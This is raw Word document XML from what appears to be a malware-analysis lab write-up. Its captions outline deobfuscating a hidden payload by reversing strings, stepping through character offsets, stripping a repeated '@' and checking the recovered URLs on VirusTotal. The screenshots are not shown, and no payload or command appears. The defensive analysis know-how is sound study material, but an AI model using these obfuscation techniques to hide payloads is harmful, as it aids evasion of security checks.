    <w:p w:rsidR="002A4187" w:rsidRDefault="002A4187"/>
    <w:p w:rsidR="002A4187" w:rsidRDefault="002A4187"/>
    <w:p w:rsidR="002A4187" w:rsidRDefault="002A4187">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Check for any Syntax highlighter </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A4187" w:rsidRDefault="002A4187">
      <w:r w:rsidRPr="002A4187">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4787534D" wp14:editId="33E242A9">
            <wp:extent cx="5916117" cy="3459480"/>
            <wp:effectExtent l="0" t="0" r="8890" b="7620"/>
            <wp:docPr id="129571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11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7610" cy="346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187" w:rsidRDefault="002A4187">
      <w:r>
        <w:t xml:space="preserve">Apply reverse </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A4187" w:rsidRDefault="002A4187">
      <w:r w:rsidRPr="002A4187">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C6D4FBE" wp14:editId="4CDE5A06">
            <wp:extent cx="5731510" cy="3328035"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="106629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999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27D" w:rsidRDefault="00D0527D"/>
    <w:p w:rsidR="00D0527D" w:rsidRDefault="00D0527D"/>
    <w:p w:rsidR="00D0527D" w:rsidRDefault="00D0527D"/>
    <w:p w:rsidR="00D0527D" w:rsidRDefault="00D0527D"/>
    <w:p w:rsidR="00D0527D" w:rsidRDefault="00D0527D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Check for syntax </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>highlighter :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00D0527D" w:rsidRDefault="00D0527D">
      <w:r w:rsidRPr="00D0527D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="748A7CE9" wp14:editId="5EF70305">
            <wp:extent cx="6096000" cy="3539003"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="205510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005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4596" cy="354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897" w:rsidRDefault="00775897">
      <w:r>
        <w:t xml:space="preserve">It highlights starting string but still we didn’t get any proper output </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D0527D" w:rsidRDefault="00775897">
      <w:r>
        <w:t xml:space="preserve">Iteration given in source </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">code </w:t>
      </w:r>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>+1640 ,  -3 ,+2 )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00252E45" w:rsidRDefault="00252E45">
      <w:r w:rsidRPr="00252E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B0523D5" wp14:editId="46C414E5">
            <wp:extent cx="6134100" cy="3585587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="162181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11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1924" cy="35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45" w:rsidRDefault="00252E45"/>
    <w:p w:rsidR="00252E45" w:rsidRDefault="00252E45"/>
    <w:p w:rsidR="002A4187" w:rsidRDefault="00252E45">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">To avoid characters in different lines  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00252E45" w:rsidRDefault="00252E45">
      <w:r w:rsidRPr="00252E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BCDDF7E" wp14:editId="1ABF29AF">
            <wp:extent cx="6301740" cy="3677295"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="45832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279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3863" cy="367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45" w:rsidRDefault="00252E45">
      <w:r>
        <w:t xml:space="preserve">To extract in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>formate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00252E45" w:rsidRDefault="00252E45">
      <w:r w:rsidRPr="00252E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5129384A" wp14:editId="353012D8">
            <wp:extent cx="6256020" cy="3613881"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1007586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867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7697" cy="36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45" w:rsidRDefault="00252E45"/>
    <w:p w:rsidR="00252E45" w:rsidRDefault="00252E45"/>
    <w:p w:rsidR="00252E45" w:rsidRDefault="00252E45"/>
    <w:p w:rsidR="00252E45" w:rsidRDefault="00252E45">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Remove most repeated one which is @ here </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00252E45" w:rsidRDefault="00252E45">
      <w:r w:rsidRPr="00252E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B200745" wp14:editId="003DC09C">
            <wp:extent cx="6272795" cy="3649980"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="119431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128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2293" cy="36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45" w:rsidRDefault="00252E45"/>
    <w:p w:rsidR="00252E45" w:rsidRDefault="00252E45">
      <w:r>
        <w:t xml:space="preserve">Check those links in Virus total to check which malicious activity is there inside with the respective link </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00252E45" w:rsidRDefault="00252E45"/>
    <w:p w:rsidR="00252E45" w:rsidRDefault="00252E45">
      <w:r>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>example</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> paste 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00252E45">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> link of output in </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="003154C2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.virustotal.com/gui/home/url</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00252E45" w:rsidRDefault="00252E45">
      <w:r w:rsidRPr="00252E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AF455B2" wp14:editId="2EF18EA0">
            <wp:extent cx="5731510" cy="2919730"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="33274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404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45" w:rsidRDefault="00252E45"/>
    <w:p w:rsidR="00A605C1" w:rsidRDefault="00A605C1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Just load it you can see what are the malicious activity inside the link</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A605C1" w:rsidRDefault="00A605C1">
      <w:r w:rsidRPr="00A605C1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46F2EEA0" wp14:editId="17ADCA1C">
            <wp:extent cx="5731510" cy="2656205"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="28092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266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5C1" w:rsidRDefault="00A605C1">
      <w:r>
        <w:t xml:space="preserve">Like that you check remaining links also </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A605C1" w:rsidRDefault="00A605C1">
      <w:r>
        <w:t xml:space="preserve">This is the way where attacker hides malicious activity inside </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inside</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00252E45" w:rsidRDefault="00252E45"/>
    <w:p w:rsidR="00252E45" w:rsidRDefault="00252E45"/>
    <w:p w:rsidR="00252E45" w:rsidRDefault="00252E45"/>
    <w:p w:rsidR="00252E45" w:rsidRDefault="00252E45"/>
    <w:p w:rsidR="00252E45" w:rsidRDefault="00252E45"/>
    <w:p w:rsidR="00252E45" w:rsidRDefault="00252E45"/>
    <w:p w:rsidR="002A4187" w:rsidRDefault="002A4187"/>
    <w:p w:rsidR="002A4187" w:rsidRDefault="002A4187"/>
    <w:p w:rsidR="00D0527D" w:rsidRDefault="00D0527D"/>
    <w:p w:rsidR="00D0527D" w:rsidRDefault="00D0527D"/>
    <w:p w:rsidR="002A4187" w:rsidRDefault="002A4187"/>
    <w:p w:rsidR="002A4187" w:rsidRDefault="002A4187"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:bookmarkEnd w:id="0"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:sectPr w:rsidR="001B71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62049" w:rsidRDefault="00862049" w:rsidP="00A36A34">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00862049" w:rsidRDefault="00862049" w:rsidP="00A36A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62049" w:rsidRDefault="00862049" w:rsidP="00A36A34">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00862049" w:rsidRDefault="00862049" w:rsidP="00A36A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A1A"/>
    <w:rsid w:val="00063A1A"/>
    <w:rsid w:val="001B31A4"/>
    <w:rsid w:val="001B710F"/>
    <w:rsid w:val="001D7369"/>
    <w:rsid w:val="00252E45"/>
    <w:rsid w:val="002A4187"/>
    <w:rsid w:val="00455C03"/>
    <w:rsid w:val="00775897"/>
    <w:rsid w:val="00862049"/>
    <w:rsid w:val="008C26D1"/>
    <w:rsid w:val="00A36A34"/>
    <w:rsid w:val="00A605C1"/>
    <w:rsid w:val="00B325D1"/>
    <w:rsid w:val="00B44F77"/>
    <w:rsid w:val="00C72B7D"/>
    <w:rsid w:val="00D0527D"/>
    <w:rsid w:val="00DA7509"/>
    <w:rsid w:val="00EC76B7"/>
    <w:rsid w:val="00FC4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CE49A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{ADA09BD6-AA85-4F12-9631-50CAEBD26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6A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A34"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A36A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6A34"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00252E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2E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www.virustotal.com/gui/home/url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1</Pages>
  <Words>1090</Words>
  <Characters>6216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Manikanta</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Lokesh Manikanta</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-18T06:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-18T17:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>